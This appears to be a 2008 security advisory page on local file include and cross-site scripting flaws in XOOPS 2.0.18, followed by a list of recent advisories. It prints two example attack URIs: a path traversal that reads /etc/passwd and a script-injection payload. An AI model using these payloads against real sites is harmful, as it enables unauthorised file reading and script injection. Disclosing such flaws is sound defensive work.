exploits , vulnerabilities , articles , XOOPS Local File Include and Cross Site Scripting Vulnerabilities

Title	XOOPS Local File Include and Cross Site Scripting Vulnerabilities
Published	2008-07-21-12:00AM
Updated	2008-07-22-09:28PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Ciph3r
Vulnerable	Xoops Xoops 2.0.18 1
Not Vulnerable
Code	Attackers can exploit this issue via a browser.The following example URIs are available:For the local file-include issue:http://www.example.com/scripts_path/modules/system/admin.php?fct=../../../../../../../../../../etc/passwd%00For the cross-site scripting issue:http://www.example.com/scripts_path/modules/system/admin.php?fct="><script>alert("xss")</script>
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-11-22 KVIrc URI Handler Remote Command Execution Vulnerability
• 2008-11-22 NVIDIA Cg Toolkit Installer Insecure Temporary File Creation Vulnerability
• 2008-11-22 TkUsr Insecure Temporary File Creation Vulnerability
• 2008-11-21 TAU Tuning and Analysis Utilities Insecure Temporary File Creation Vulnerabilities
• 2008-11-21 Maildirsync Insecure Temporary File Creation Vulnerability
• 2008-11-21 TkMan Insecure Temporary File Creation Vulnerability
• 2008-11-21 Apple iPhone Configuration Web Utility for Windows Directory Traversal Vulnerability
• 2008-11-21 Cisco IOS and CatOS VLAN Trunking Protocol Packet Handling Denial Of Service Vulnerability
• 2008-11-21 vBulletin Visitor Messages Addon Comment Notification HTML Injection Vulnerability
• 2008-11-21 Apple Mac OS X CoreGraphics Multiple Memory Corruption Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 22:30:02 +0000